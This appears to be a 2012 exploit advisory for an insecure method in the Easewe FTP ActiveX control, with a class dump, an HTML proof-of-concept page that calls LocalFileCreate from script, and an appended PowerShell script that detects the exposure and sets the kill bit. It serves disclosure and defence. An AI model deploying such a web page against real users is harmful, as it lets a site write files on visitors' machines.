
Easewe FTP (EaseWeFtp.ocx) Insecure Method

08 Aug 2012 | Reported by coolkaveh | Type: zdt | Source: 0day.today

Easewe FTP Insecure Method Exploit Foun

Code
Exploit Title: Easewe FTP(EaseWeFtp.ocx) Insecure Method Exploit
Date: 2012-08-08
Author: coolkaveh
[email protected]
Https://twitter.com/coolkaveh
Vendor Homepage: http://www.ftpocx.com/download.htm
Version: 4.6.02
Tested on: Windows 7
Awesome Hesam BOF
==========================================================================
Class FtpLibrary
GUID: {31AE647D-11D1-4E6A-BE2D-90157640019A}
Number of Interfaces: 1
Default Interface: _FtpLibrary
RegKey Safe for Script: True
RegkeySafe for Init: True
KillBitSet: False
Interface _FtpLibrary : IDispatch
Default Interface: True
Members : 161
	QueueAppend
	QueueRemove
	FormatSize
	FormatFileSize
	FormatTime
	SFDFileName
	SFDFilter
	SFDInitialDir
	SFDTitle
	ShowBrowseFolderDialog
	ShowSaveFileDialog
	ServerName
	Username
	Password
	Port
	RemotePort
	RemotePath
	LocalPath
	ReplaceIndex
	ReplaceSetting
	RenameRule
	Percent
	MKDInfo
	MaxSpeed
	Rcvbuf
	Sndbuf
	Timeout
	RedoTimes
	AllowType
	DenyType
	MaxSize
	Title
	Encoding
	TranstatePath
	KeepAliveCommand
	KeepAliveInterval
	ListCommand
	ListSuffix
	LangInfo
	Info
	SInfo
	Lype
	ExistFile
	GetFileSize
	GetFtpFileSize
	GetFileInfo
	GetFtpFileInfo
	GetFileList
	GetFtpDirectoryInfo
	ExistDirectory
	CreateDirectory
	RemoveDirectory
	DeleteFile
	RenameFile
	SendCommand
	SetCurrentDirectory
	GetFileName
	GetFileNameWithoutExt
	GetFileExtension
	GetParentPath
	LocalFileExists
	LocalFolderExists
	LocalFileCreate
	LocalFolderCreate
	LocalFileDelete
	LocalFileRead
	LocalFileWrite
	GetLocalFileSize
	GetLocalFolderSize
	GetLocalFileCount
	GetLocalFileDate
	GetLocalFileList
	ShowCmd
	Execute
	Explore
	GetDriveNames
	ProxyHost
	ProxyPort
	RegCreate
	RegSetValue
	RegSetValueEx
	RegDelete
	RegDeleteValue
	RegDeleteValueEx
	RegGetValue
	RegGetValueEx
	RegExists
============================================================================
<HTML>
Easewe FTP(EaseWeFtp.ocx) Insecure Method Exploit<br>
<br>
Description: There is an insecure method in the (LocalFileCreate) function<br>
Found By : coolkaveh<br>

<title>Exploited By : coolkaveh </title>
<BODY>
 <object id=cyber classid="clsid:{31AE647D-11D1-4E6A-BE2D-90157640019A}"></object>
 
<SCRIPT>
 
function Do_it()
 {
     File = "kaveh.txt"
   cyber.LocalFileCreate(File)
 }
 
</SCRIPT>
<input language=JavaScript onclick=Do_it() type=button value="Click here To Test"><br>
</body>
</HTML>

#  0day.today [2018-01-04]  #
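
A defensive check for the state the class dump above reports (Safe for Script: True, Safe for Init: True, KillBitSet: False), as an added example that is not part of the original advisory. It reads the standard COM safety-category and Internet Explorer kill-bit registry locations for the advisory's CLSID and can set the kill bit; the function names are hypothetical and it assumes a machine-wide (HKLM) registration.

```powershell
# Added example, not from the advisory. Run from an elevated prompt.
$Clsid   = '{31AE647D-11D1-4E6A-BE2D-90157640019A}'   # FtpLibrary CLSID from the advisory
$CatIds  = @{                                          # standard COM safety category IDs
    SafeForScripting = '{7DD95801-9882-11CF-9FA9-00AA006C42C4}'
    SafeForInit      = '{7DD95802-9882-11CF-9FA9-00AA006C42C4}'
}
$KillBit = 0x400                                       # kill-bit value in "Compatibility Flags"
# Native and 32-bit-on-64-bit registry views; the second is absent on 32-bit Windows.
$Views   = 'HKLM:\SOFTWARE', 'HKLM:\SOFTWARE\Wow6432Node' |
           Where-Object { Test-Path -LiteralPath $_ }

# Hypothetical helper: path of the control's ActiveX Compatibility key in one view.
function Get-CompatKey([string]$View) {
    "$View\Microsoft\Internet Explorer\ActiveX Compatibility\$Clsid"
}

# Report, per registry view, whether the control is registered and how exposed it is.
function Get-ControlExposure {
    foreach ($view in $Views) {
        $cls = "$view\Classes\CLSID\$Clsid"
        if (-not (Test-Path -LiteralPath $cls)) { continue }   # not registered in this view
        $flags = (Get-ItemProperty -LiteralPath (Get-CompatKey $view) `
                  -ErrorAction SilentlyContinue).'Compatibility Flags'
        [pscustomobject]@{
            View             = $view
            Binary           = (Get-ItemProperty -LiteralPath "$cls\InprocServer32" -ErrorAction SilentlyContinue).'(default)'
            SafeForScripting = Test-Path -LiteralPath "$cls\Implemented Categories\$($CatIds.SafeForScripting)"
            SafeForInit      = Test-Path -LiteralPath "$cls\Implemented Categories\$($CatIds.SafeForInit)"
            KillBitSet       = [bool]($flags -band $KillBit)
        }
    }
}

# Set the kill bit in every available view so neither 32- nor 64-bit hosts load the control.
function Set-ControlKillBit {
    foreach ($view in $Views) {
        $key = Get-CompatKey $view
        if (-not (Test-Path -LiteralPath $key)) { New-Item -Path $key -Force | Out-Null }
        $cur = (Get-ItemProperty -LiteralPath $key -ErrorAction SilentlyContinue).'Compatibility Flags'
        # OR the bit in so any other compatibility flags already present are preserved.
        Set-ItemProperty -LiteralPath $key -Name 'Compatibility Flags' -Type DWord -Value ($cur -bor $KillBit)
    }
}

Get-ControlExposure | Format-Table -AutoSize   # report current state
# Set-ControlKillBit                           # uncomment to block the control in IE
```

The kill bit stops Internet Explorer and other hosts that honour it from instantiating the control; uninstalling or unregistering the OCX removes the exposure entirely.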

Vulners AI Score: 7 (High risk)